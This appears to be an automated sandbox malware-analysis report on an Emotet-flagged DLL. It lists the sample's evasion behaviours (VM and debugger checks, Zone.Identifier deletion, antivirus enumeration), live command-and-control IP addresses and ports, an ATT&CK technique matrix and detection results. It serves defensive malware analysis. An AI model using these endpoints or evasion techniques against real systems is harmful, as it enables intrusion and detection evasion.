Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\SysWOW64\regsvr32.exe	File opened: C:\Windows\SysWOW64\Ofpagmb\vfvyklscua.sam:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Bybhadxaxdq\chsskqcjil.mpx:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Mljnrgyarrslr\zmqsujpnwal.uxz:Zone.Identifier read attributes \| delete	Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_10007AE5 IsIconic,GetWindowPlacement,GetWindowRect,		2_2_10007AE5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10007AE5 IsIconic,GetWindowPlacement,GetWindowRect,		3_2_10007AE5

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Windows\System32\svchost.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Windows\System32\svchost.exe TID: 6028	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6028	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 3812	Thread sleep time: -90000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 3768	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\SysWOW64\rundll32.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

graph_3-17046

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	API coverage: 2.3 %
Source: C:\Windows\SysWOW64\rundll32.exe	API coverage: 3.1 %

Source: C:\Windows\SysWOW64\regsvr32.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_10010839 VirtualQuery,GetSystemInfo,VirtualQuery,VirtualAlloc,VirtualProtect,

2_2_10010839

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_1002592C __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,		2_2_1002592C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1002592C __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,		3_2_1002592C

Source: C:\Windows\SysWOW64\regsvr32.exe	API call chain: ExitProcess graph end node			graph_2-20479
Source: C:\Windows\SysWOW64\rundll32.exe	API call chain: ExitProcess graph end node			graph_3-17047

Source: C:\Windows\SysWOW64\regsvr32.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior

Source: svchost.exe, 00000016.00000002.419834806.0000023CBFAF7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $@Hyper-V RAW
Source: svchost.exe, 0000001C.00000002.776500854.000001BF01C54000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.
Source: svchost.exe, 00000013.00000002.676744521.000002799FC64000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @Hyper-V RAWGlobal\BFE_Notify_Event_{41bbeee1-a916-4bfe-82e5-0142a5910b49}LMEM
Source: svchost.exe, 0000001C.00000002.776500854.000001BF01C54000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware7,1
Source: svchost.exe, 0000001C.00000002.776424184.000001BF01C0A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware Virtual RAM00000001VMW-4096MBRAM slot #0RAM slot #0
Source: svchost.exe, 0000000A.00000002.773531585.000001ABFFE02000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
Source: svchost.exe, 00000013.00000002.676724746.000002799FC57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.676148634.000002799A424000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.419799470.0000023CBFAE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.419688769.0000023CBFA8A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001C.00000002.774780396.000001BF00CC5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001C.00000002.774250367.000001BF00C5E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 0000001C.00000002.776424184.000001BF01C0A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7
Source: svchost.exe, 0000001C.00000002.776424184.000001BF01C0A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware SVGA IIES1371
Source: svchost.exe, 0000001C.00000002.776424184.000001BF01C0A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware Virtual RAM
Source: svchost.exe, 0000001C.00000002.776424184.000001BF01C0A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.NoneVMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7VMware7,1
Source: svchost.exe, 0000001C.00000002.776424184.000001BF01C0A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware SVGA II
Source: svchost.exe, 0000001C.00000002.776424184.000001BF01C0A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.VMW71.00V.18227214.B64.210625222006/25/2021
Source: svchost.exe, 0000000A.00000002.773797062.000001ABFFE29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.774248414.00000175ABA65000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.773860880.00000262CDA2A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_10025CEC __EH_prolog,LoadLibraryA,GetProcAddress,

2_2_10025CEC

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_10005260 GetNativeSystemInfo,GetProcessHeap,HeapAlloc,memcpy,

2_2_10005260

Source: C:\Windows\System32\loaddll32.exe

Process queried: DebugPort

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 217.182.25.250 8080	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 70.36.102.35 443	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 51.91.76.89 8080	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 119.193.124.41 7080	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 92.240.254.110 8080	Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\CUfsVUDkr6.dll",#1

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: GetThreadLocale,GetLocaleInfoA,GetACP,	2_2_10001090
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: lstrcpyA,LoadLibraryA,GetLocaleInfoA,	2_2_100348C4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: GetLocaleInfoA,	2_2_1001A444
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetThreadLocale,GetLocaleInfoA,GetACP,	3_2_10001090
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: lstrcpyA,LoadLibraryA,GetLocaleInfoA,	3_2_100348C4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,	3_2_1001A444

Source: C:\Windows\SysWOW64\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_10011075 GetSystemTimeAsFileTime,__aulldiv,

2_2_10011075

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_10018E14 __lock,_strlen,_strncpy,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,_strncpy,

2_2_10018E14

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_10001100 GetVersionExA,InterlockedExchange,

2_2_10001100

Lowering of HIPS / PFW / Operating System Security Settings

Changes security center settings (notifications, updates, antivirus, firewall)

Source: C:\Windows\System32\svchost.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval

Jump to behavior

Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct

Source: svchost.exe, 0000001C.00000002.776298072.000001BF015F3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \BullGuard Ltd\BullGuard\BullGuard.exe
Source: svchost.exe, 00000010.00000002.773716695.00000161FCE3D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: (@V%ProgramFiles%\Windows Defender\MsMpeng.exe
Source: svchost.exe, 00000010.00000002.774051870.00000161FCF02000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Stealing of Sensitive Information

Yara detected Emotet

Source: Yara match	File source: 4.2.rundll32.exe.4ce0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.regsvr32.exe.4690000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.940000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.3390000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.regsvr32.exe.4690000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.4760000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.43a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.940000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.3390000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.4790000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.regsvr32.exe.46c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.4760000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.774599292.00000000046C1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.261732368.0000000004760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.258847425.0000000003390000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.259038196.0000000004CE1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.774512688.0000000004690000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.261764431.0000000004791000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.258613972.0000000000940000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.258886140.00000000043A1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	1 Input Capture	2 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	12 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	2 Native API	Boot or Logon Initialization Scripts	111 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	2 File and Directory Discovery	Remote Desktop Protocol	1 Input Capture	Exfiltration Over Bluetooth	1 Non-Standard Port	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	2 Obfuscated Files or Information	Security Account Manager	36 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	11 Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 DLL Side-Loading	NTDS	151 Security Software Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 File Deletion	LSA Secrets	13 Virtualization/Sandbox Evasion	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	2 Masquerading	Cached Domain Credentials	1 Process Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	13 Virtualization/Sandbox Evasion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	111 Process Injection	Proc Filesystem	1 Remote System Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	1 Hidden Files and Directories	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	1 Regsvr32	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	1 Rundll32	Input Capture	Permission Groups Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
CUfsVUDkr6.dll	67%	Virustotal		Browse
CUfsVUDkr6.dll	100%	Avira	TR/AD.Nekark.bnwrm
CUfsVUDkr6.dll	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
4.2.rundll32.exe.4ce0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
3.2.rundll32.exe.43a0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
2.2.regsvr32.exe.4760000.0.unpack	100%	Avira	HEUR/AGEN.1215461	Download File
5.2.regsvr32.exe.4690000.0.unpack	100%	Avira	HEUR/AGEN.1215461	Download File
4.2.rundll32.exe.3390000.0.unpack	100%	Avira	HEUR/AGEN.1215461	Download File
3.2.rundll32.exe.940000.0.unpack	100%	Avira	HEUR/AGEN.1215461	Download File
5.2.regsvr32.exe.46c0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
2.2.regsvr32.exe.4790000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://www.disneyplus.com/legal/your-california-privacy-rights	0%	URL Reputation	safe
http://crl.ver)	0%	Avira URL Cloud	safe
https://www.tiktok.com/legal/report/feedback	0%	URL Reputation	safe
https://%s.xboxlive.com	0%	URL Reputation	safe
https://www.disneyplus.com/legal/privacy-policy	0%	URL Reputation	safe
https://dynamic.t	0%	URL Reputation	safe
https://www.pango.co/privacy	0%	URL Reputation	safe
https://disneyplus.com/legal.	0%	URL Reputation	safe
http://help.disneyplus.com.	0%	URL Reputation	safe
https://%s.dnet.xboxlive.com	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

⊘No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx	svchost.exe, 0000000E.00000003.318375087.000002516B461000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.disneyplus.com/legal/your-california-privacy-rights	svchost.exe, 00000016.00000003.394883729.0000023CC03AF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.394786236.0000023CC038D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=	svchost.exe, 0000000E.00000003.318472678.000002516B456000.00000004.00000020.00020000.00000000.sdmp	false		high
https://dev.ditu.live.com/REST/v1/Routes/	svchost.exe, 0000000E.00000002.318770388.000002516B43D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Routes/Driving	svchost.exe, 0000000E.00000003.318375087.000002516B461000.00000004.00000020.00020000.00000000.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx	svchost.exe, 0000000E.00000002.318770388.000002516B43D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://dev.ditu.live.com/REST/v1/Traffic/Incidents/	svchost.exe, 0000000E.00000002.318836178.000002516B45C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.318434954.000002516B45A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://t0.tiles.ditu.live.com/tiles/gen	svchost.exe, 0000000E.00000002.318818550.000002516B44D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.318337851.000002516B449000.00000004.00000020.00020000.00000000.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Routes/	svchost.exe, 0000000E.00000002.318770388.000002516B43D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=	svchost.exe, 0000000E.00000003.318450731.000002516B440000.00000004.00000020.00020000.00000000.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Routes/Walking	svchost.exe, 0000000E.00000003.318375087.000002516B461000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.ver)	svchost.exe, 00000013.00000002.676785569.000002799FC89000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.419799470.0000023CBFAE8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?	svchost.exe, 0000000E.00000003.318450731.000002516B440000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.318836178.000002516B45C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.318434954.000002516B45A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.tiktok.com/legal/report/feedback	svchost.exe, 00000016.00000003.398796153.0000023CC038D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.398927241.0000023CC0818000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=	svchost.exe, 0000000E.00000002.318770388.000002516B43D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.318685600.000002516B413000.00000004.00000020.00020000.00000000.sdmp	false		high
https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=	svchost.exe, 0000000E.00000002.318795830.000002516B442000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.318450731.000002516B440000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.318477372.000002516B441000.00000004.00000020.00020000.00000000.sdmp	false		high
https://%s.xboxlive.com	svchost.exe, 0000000B.00000002.774092172.00000175ABA44000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	low
https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=	svchost.exe, 0000000E.00000002.318818550.000002516B44D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.318337851.000002516B449000.00000004.00000020.00020000.00000000.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Locations	svchost.exe, 0000000E.00000003.318375087.000002516B461000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=	svchost.exe, 0000000E.00000003.318450731.000002516B440000.00000004.00000020.00020000.00000000.sdmp	false		high
https://dev.virtualearth.net/mapcontrol/logging.ashx	svchost.exe, 0000000E.00000003.318375087.000002516B461000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.hotspotshield.com/	svchost.exe, 00000016.00000003.389730375.0000023CC081A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.389593585.0000023CC03AC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.389883804.0000023CC0389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.389629399.0000023CC0389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.389660788.0000023CC03B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.389642184.0000023CC039A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.389783418.0000023CC0802000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.389683950.0000023CC081A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://dev.ditu.live.com/mapcontrol/logging.ashx	svchost.exe, 0000000E.00000003.318375087.000002516B461000.00000004.00000020.00020000.00000000.sdmp	false		high
https://dev.ditu.live.com/REST/v1/Imagery/Copyright/	svchost.exe, 0000000E.00000003.318434954.000002516B45A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=	svchost.exe, 0000000E.00000003.318450731.000002516B440000.00000004.00000020.00020000.00000000.sdmp	false		high
https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=	svchost.exe, 0000000E.00000003.318434954.000002516B45A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.disneyplus.com/legal/privacy-policy	svchost.exe, 00000016.00000003.394883729.0000023CC03AF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.394786236.0000023CC038D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/	svchost.exe, 0000000E.00000002.318836178.000002516B45C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.318434954.000002516B45A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Transit/Schedules/	svchost.exe, 0000000E.00000002.318795830.000002516B442000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.318450731.000002516B440000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.318477372.000002516B441000.00000004.00000020.00020000.00000000.sdmp	false		high
https://dynamic.t	svchost.exe, 0000000E.00000003.318375087.000002516B461000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.318434954.000002516B45A000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/09/enumeration	svchost.exe, 00000013.00000002.676470792.000002799A4B2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.675741527.000002799A4AC000.00000004.00000020.00020000.00000000.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Routes/Transit	svchost.exe, 0000000E.00000003.318375087.000002516B461000.00000004.00000020.00020000.00000000.sdmp	false		high
